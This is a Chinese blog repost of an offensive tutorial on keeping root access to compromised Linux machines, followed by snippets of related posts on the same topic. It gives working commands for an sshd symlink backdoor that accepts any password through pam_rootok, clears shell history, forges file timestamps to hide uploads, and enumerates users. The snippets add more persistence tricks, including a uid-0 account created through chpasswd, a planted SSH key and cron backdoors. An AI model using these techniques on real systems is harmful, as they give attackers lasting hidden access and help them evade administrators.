SSH 维持权限(好用)

最新推荐文章于 2023-05-25 12:31:44 发布
最新推荐文章于 2023-05-25 12:31:44 发布
阅读量111 收藏
点赞数
文章标签: 运维 awk 数据库
原文链接:http://www.cnblogs.com/Rightsec/p/11006189.html
版权

很多时候我们拿下机器后需要维持权限,在计划任务上加入定时反弹shell这很容易被 运维人员发现,有些场景没必要用到rootkit级别的后门,我们可以尝试使用ssh后门

 

1.目的

长期维持机器root权限,同时后门有需要躲避管理检测
通信隐蔽、自启动项隐藏、文件隐藏、进程/模块隐藏、注册表隐藏、服务隐藏、端口隐藏等

SSH命令痕迹清除,登陆之后先执行

unset HISTFILE;export HISTFILESIZE=0;export HISTIGNORE=*;export HISTCONTROL=ignorespace

每次输入命令前加上空格即可不再history中记录命令

2.后门方式
ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337
3.使用使用任意密码登录系统后门
ssh root:test@192.168.116.100 -p 31338
4.查看存在哪些用户
cat /etc/passwd|grep -v nologin|grep -v halt|grep -v shutdown|awk -F":" '{ print $1"|"$3"|"$4 }'|more
1 # 如下
2 root|0|0
3 sync|4|65534
4 mysql|104|109
5 postgres|113|117
6 arpwatch|117|120
7 Debian-snmp|118|123
8 speech-dispatcher|127|29
9 Debian-gdm|130|138
5.修改上传文件时间戳

touch -r 老文件时间戳 新文件时间戳

6.退出ssh
exit
 注

0.任意密码登陆的核心是auth sufficient pam_rootok.so,只要PAM配置文件中包含此配置即可SSH任意密码登陆,实践表明,可成功利用的PAM配置文件除了su还有chsh、chfn
1.前提linux软连接连接ssh后门需要ssh配置允许PAM认证才能使用
2.被控主机不允许root登录,可用其他已存在用户登录

转载于:https://www.cnblogs.com/Rightsec/p/11006189.html

weixin_30920853
关注
内网渗透-Linux权限维持
lza20001103的博客
09-26 2386
Linux权限维持 文章目录Linux权限维持前言ssh后门Setuid and SetgidLinux隐藏技术后记 前言 前面讲解了window中的权限维持的方法,本期给大家讲解一下Linux中权限维持的方法,内容比较少,大家还是能掌握尽量都掌握吧,在以后的工作渗透中,也是需要用上的。 ssh后门 过滤 ps -elf |grep 12345 监听端口 nc -lvvp 123 查看端口 netstat -anlp|grep 12345 (1)ssh后门(脚本内容)(192.168.231.134) #!
Linux权限维持
weixin_41949487的博客
07-01 3054
在渗透过程中拿到目标权限只是开始,通常会留下后门以便再次访问(简称APT)。所以需要进行权限维持,隐藏后门。常见的Linux后门有cron后门、ssh后门、vim后门、隐藏文件、添加超级用户、alias后门等等,本文将对Linux下常见的权限维持后门技术进行解析。 添加用户 添加uid=0的用户 创建用户,并修改/etc/passwd文件 useradd tide;echo 'tide:123456' | chpasswd # 创建用户tide并修改密码为123456 vi /etc/passwd
操作系统权限维持(八)之Linux系统-SSHKey后门
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-27 816
当我们具有写入权限的时候,我们同样可以自行生成密钥,当kali机器第一次生成密钥的时候,并且把公钥放在了你的服务器上面,当你把公钥放在服务器上面的时候,这就意味着他可以正常的解密和加密你发过来的内容,后面你就是通过加解密去认证会话的,并不需要输入密码。将 id_rsa.pub文件中的内容拷贝到目标机器上并且写入到 authorized_keys这个文件夹下。现在我们不需要密码就能连接目标机器了。
巧用OpenSSH进行域内权限维持
最新发布
2301_78287784的博客
05-25 115
当然,它默认是允许密码登录,而在域环境中,其实是可以使用kerberos完成ssh认证和登录,这一点往往是被管理员忽略的,而恰恰是可以被我们所利用的地方。这个点就很有意思了,试想一下,一台域内的服务器安装了openssh,如果不进行用户登录控制,任意一个域内用户可通过密码认证登录ssh获取shell权限。(2)假设你已经获取了域内某台服务器的权限,你可以考虑使用OpenSSH结合私钥免密码登录的方式完成域内管理员权限维持,不也是一种权限维持的好办法嘛。
权限维持技术探索】
qq_55213436的博客
01-17 1075
定义攻击者尝试维持驻点的技术,包括攻击者用来在重启、修改凭据或则其他能够切断攻击者访问的情况下,依然保持对系统的访问,具体技术包括一些访问某些页面、执行某些操作或者修改配置使得能够在系统上长久的驻留。后门的功能常见的后门往往有一些功能以达到一些目的,如:写入后门文件、会连CC、进行密码记录和挖矿等功能。权限维持常常具有:定期出发、重启出发、以及常见的事件调用唤起后门等特点。攻击者常常通过文件隐藏、进程隐藏、网络隐藏、守护进程、系统权限启动等操作达到如下目的。后门分类。
linux不用命令开启ssh,不用密码也能ssh登陆Linux?
weixin_33651906的博客
04-29 349
Linux的一个后门引发对PAM的探究1.1 起因今天在搜索关于Linux下的后门姿势时,发现一条命令如下:ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=5555;经典后门。直接对sshd建立软连接,之后用任意密码登录即可。sshroot@x.x.x.x-p5555这个是大家也经常会用到的命令,但是在好奇心的驱使下,为什么任意密码就可以了?于是搜...
linux权限维持.pdf
03-31
Linux系统的服务和进程也可以被利用来维持权限。攻击者可能会安装并启动一个服务,该服务看起来像是正常的系统服务,但实际上它是一个恶意进程。此外,攻击者还可以通过修改已存在的系统服务来实现权限维持,例如在...
Java ssh 权限系统 开发视频教程 第06讲(超清版).mp4
07-15
SSH框架提供了会话跟踪和管理的工具,例如Spring Session或者Struts2的SessionAware接口,可以用来存储用户登录信息和权限状态,确保在用户会话期间维持正确的权限控制。 最后,安全认证和授权是权限系统的核心。...
web层的权限维持
Nginxx的博客
11-17 2485
前言 在实战渗透中,经常需要上传webshell来完成对目标的权限维持。通过各种方法来构造一个免杀的webshell后门来实现webshell层面的权限维持是大家比较通用的方法,但是除了简单粗暴的写php免杀马,实战中还有一些小技巧值得去学习,毕竟除了要绕过各种waf的防护,还需要绕过“人肉waf“ 管理员的火眼金睛,因此本文将分享一些在web层权限维持常用的方法和技巧。 隐藏webshell 隐藏webshell是web层维持权限的基本方法,但是如果直接写php文件,哪怕是源码免杀,也很容易被管理员发现,
Linux权限维持(三)
pingan233的博客
02-23 429
根据原理我们可以知道配置文件的核心是pam配置中的pam_rootok.so,所以只需包含这句话就可以实现后门功能,而且默认的配置文件中除了su,还有其他的可利用的配置文件。,只要PAM配置文件中包含此配置即可SSH任意密码登陆,实践表明,可成功利用的PAM配置文件除了su还有chsh、chfn。通过软连接的方式,实质上PAM认证是通过软连接的文件名(如:/tmp/su,/home/su)在。,所以我们可以在找不到其他的可以进行软连接的文件时,自己创建一个包含。都可以,只要文件位置有su文件。
应急响应笔记
weixin_46595570的博客
04-15 1167
黑客病毒千千万,人才工具处处有。 攻击威胁早发现,不留后门要根除。 面对各种各样的安全事件,我们该怎么处理? 当企业发生黑客入侵、系统崩溃或其它影响业务正常运行的安全事件时,急需第一时间进行处理,使企业的网络信息系统在最短时间内恢复正常工作,进一步查找入侵来源,还原入侵事故过程,同时给出解决方案与防范措施,为企业挽回或减少经济损失。 对于病毒入侵,黑客攻击等等我们又知道多少? 所以在现实中会时不时出现不同的人,不同的手段攻击我们,这时我们就需要进行应急响应分析。 目录 分析入侵原因-
内网渗透初探(三) | 查缺补漏
weixin_42508548的博客
12-23 4431
一、前言 从linux打进去到域环境,到获取域控权限。因为前面基本都是在讲windows,这里补一篇linux的,全篇实操,喜欢的小伙伴们快来呀~ 二、外网打点 1、打开站点,很正常的一个登录界面 2、尝试登录后发现典型的shiro特征。 3、使用工具直接打shiro反序列化即可。 下载地址: GitHub - j1anFen/shiro_attack: shiro反序列化漏洞综合利用,包含(回显执行命令/注入内存马) 4、直接上冰蝎马,连接 三、权限维持 权限维持其实看
ssh软连接后门
weixin_60719780的博客
05-23 577
软连接后门的原理是利用了PAM配置文件的作用,将sshd文件软连接名称设置为su,这样应用在启动过程中会去PAM配置文件中寻找是否存在对应名称的配置信息(su),su在pam_rootok只检测uid 0 即认证成功,导致可以使用任意密码去登录。
操作系统权限维持(十)之Linux系统-SSH 软连接后门
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-27 491
软连接后门的原理是利用了PAM配置文件的作用,将sshd文件软连接名称设置为su,这样应用在启动过程中他会去PAM配置文件夹中寻找是否存在对应名称的配置信息(su),然而 su 在 pam_rootok 只检测 uid 0 即可认证成功,这样就导致了可以使用任意密码登录
小白白红队初成长(6)Linux权限维持
划水的小白白
02-20 2167
0、前言 0.1、闲谈 0.2、强制删除用户 0.3、给某用户sudo 0.4、查看哪些用户拥有root权限 1、隐藏后门技巧 1.1、修改文件属性 1.2、文件锁定 1.3、历史操作命令 2、添加用户 2.1、/etc/passwd写入用户 nologin用户、UID 2.1.1 存在交互的shell且允许uid=0的⽤户远程登录 2.1.2 存在交互的shell不允许uid=0的⽤户远程登录(高版本) 2.1.3 没交互shell⽆回显添加Linux账户密码 3、SUID 4、公私钥 4.1、利用过程
关于linux中SSH爆破总结
weixin_34372728的博客
01-15 1085
2.思路 (1)对root账号进行暴力破解 (2)使用中国姓名top1000作为用户名进行暴力破解 (3)使用top 10000 password字典进行密码破解 (4)利用掌握信息进行社工信息整理并生成字典暴力破解 (5)信息的综合利用以及循环利用 ssh后门 1. 软连接后门 ln -sf /usr/sbin/sshd /tmp/su; /tmp/su-oP...
linux生成pam,Linux的一个后门引发对PAM的探究
weixin_32097465的博客
05-14 215
1.1起因今天在搜索关于Linux下的后门姿势时,发现一条命令如下:软链接后门:Defaultln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=5555;1ln-sf/usr/sbin/sshd/tmp/su;/tmp/su-oPort=5555;经典后门。直接对sshd建立软连接,之后用任意密码登录即可。sshroot@x.x.x.x-p55...
linux 简单ssh后门,Linux软连接ssh后门之我见
weixin_39682897的博客
05-12 983
0x00 前言学习了Sevck发表Linux软连接后门的《一条命令引发的思考》,还是存在几个疑惑点,仔细探究之后就有了这篇文章0x01简单回顾一、Linux经典软连接后门命令1.在被控制端执行:ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oport=12345建立sshd的软连接2.本地客户端执行:ssh [emailprotected] -p 12345接着输...
SSH框架下RBAC权限管理系统的实现与优化
"基于RBAC和SSH权限管理系统的设计和实现" 本文主要探讨了如何利用基于角色的访问控制模型(RBAC)和SSH(Struts+Spring+Hibernate)框架来设计和实现一个权限管理系统。RBAC模型因其灵活性和可扩展性在复杂的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值